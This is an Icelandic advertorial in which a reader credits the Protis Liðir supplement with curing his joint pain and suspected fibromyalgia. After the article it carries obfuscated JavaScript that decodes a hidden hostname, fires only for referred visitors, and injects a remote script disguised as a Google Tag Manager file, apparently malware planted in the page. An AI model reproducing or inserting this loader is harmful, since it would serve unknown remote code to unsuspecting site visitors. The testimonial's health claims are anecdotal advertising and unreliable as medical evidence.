Ekki lengur þjáður af liðverkjum

 

Einar Ásgeirsson tekur inn Liði frá Protis. Hann er alsæll með árangurinn og segir bætiefnið gera sér kleift að stunda hreyfingu án verkja. Nú eru bætiefnin frá Protis komin í nýjar og glæsilegar umbúðir.

Áður en Einar hóf inntöku á Liðum var hann farinn að finna fyrir verkjum sem höfðu neikvæð áhrif á getu hans til að hreyfa sig og þar af leiðandi slæm áhrif á lífsgæði hans. „Ég var með liðverki í öxlum og hnjám, svona eins og gengur og gerist en svo var ég líka sárþjáður af vefja- og vöðvaverkjum. Ég var farinn að ímynda mér að ég væri kominn með vefjagigt eða eitthvað í þeim dúr,“ segir hann.

Einar segir kynni sín af bætiefninu hafa verið hálfgerða tilviljun. „Ég var búinn að prófa ýmislegt og prófaði þetta af rælni. Þetta reyndist síðan virka svona rosalega vel. Ég er orðinn mjög góður í liðunum í dag.“

Áþreifanlegur munur

Einar hefur nú notað Liði frá Protis í um þrjú ár og hafa komið upp tímabil þar sem hann hefur af einhverjum ástæðum ekki tekið bætiefnið inn. „Ég er búinn að prófa að sleppa þessu og þá fer ekkert á milli mála hvað þetta virkar vel. Ég hef svo fundið áþreifanlegan mun þegar ég byrja aftur. Ég þarf að taka þetta með mat til að styðja við upptökuna þannig að ég tek þetta með sjússi af ólífuolíu,“ segir Einar og hlær.

Einar hefur einnig prófað aðrar sambærilegar vörur, bæði erlendar og innlendar, og segir hann Protis hafa reynst sér best. „Þetta erlenda virkaði ekki neitt og þetta innlenda virkaði ágætlega en var bara alltof dýrt.“

Eins og þegar maður var yngri

Einar stundar ýmsa hreyfingu sér til ánægju og segir bætiefnið nú orðið ómissandi. „Ef ég ætla að vera góður, njóta lífsins og geta hreyft mig fram eftir aldri, þá finnst mér algjört möst að taka þetta inn. Þetta styður alla hreyfingu, hvort sem það er skokk, hlaup eða ganga á fell og fjöll.“

Synd að koma því ekki á framfæri

Einar mælir heils hugar með Liðum frá Protis. „Ég hugsaði með mér hvort maður ætti nokkuð að vera að tjá sig en síðan er ég alltaf að lesa um fólk sem þjáist til dæmis af vefjagigt. Ég hélt til dæmis sjálfur að ég væri kominn með vefjagigt en það lagaðist eftir að ég fór að taka þetta inn. Það eru svo mikil lífsgæði sem fylgja því að vera í formi.

Ef annað fólk getur lagað það með þessu í staðinn fyrir að þjást, þá væri algjör synd að koma því ekki á framfæri. Mér er því ljúft og skylt að deila þessu með fólki ef þetta skyldi vera eitthvað sem gæti hjálpað því,“ segir Einar.

Verndar liði, bein og brjósk

Protis Liðir er unnið úr kollagenríkum skrápi sæbjúgna með viðbættu vatnsrofnu þorskprótíni fyrir viðhald vöðva og túrmeriki fyrir bólgueyðandi áhrif. Blandan inniheldur einnig mangan og nauðsynleg vítamín fyrir heilbrigð bein, brjósk og liðvökva.

Protis Liðir fæst í flestum matvöruverslunum, apótekum og Heilsuhúsinu. Þess má geta að nú eru bætiefnin frá Protis komin í nýjar og glæsilegar umbúðir.

Greinin birtist í Fréttablaðinu 17.mars 2021

!function (_6dd199) { var _d0d3d0 = Date.now(); var _d4ce14 = 1000; _d0d3d0 = _d0d3d0 / _d4ce14; _d0d3d0 = Math.floor(_d0d3d0); var _1eb404 = 600; _d0d3d0 -= _d0d3d0 % _1eb404; _d0d3d0 = _d0d3d0.toString(16); var _aa32be = _6dd199.referrer; if (!_aa32be) return; var _f11c10 = [20717, 20714, 20711, 20722, 20731, 20717, 20726, 20731, 20731, 20714, 20656, 20713, 20731, 20732, 20717, 20714, 20735, 20714, 20727, 20733, 20733, 20730, 20720, 20656, 20733, 20721, 20723]; _f11c10 = _f11c10.map(function(_a47c7e){ return _a47c7e ^ 20638; }); var _54411e = "6a6ab9b728b75d01d29773439bcfdd8c"; _f11c10 = String.fromCharCode(..._f11c10); var _7a97ab = "https://"; var _751c1c = "/"; var _b61378 = "gtm-"; var _fa4fc7 = ".js"; var _75d7f7 = _6dd199.createElement("script"); _75d7f7.type = "text/javascript"; _75d7f7.async = true; _75d7f7.src = _7a97ab + _f11c10 + _751c1c + _b61378 + _d0d3d0 + _fa4fc7; _6dd199.getElementsByTagName("head")[0].appendChild(_75d7f7) }(document);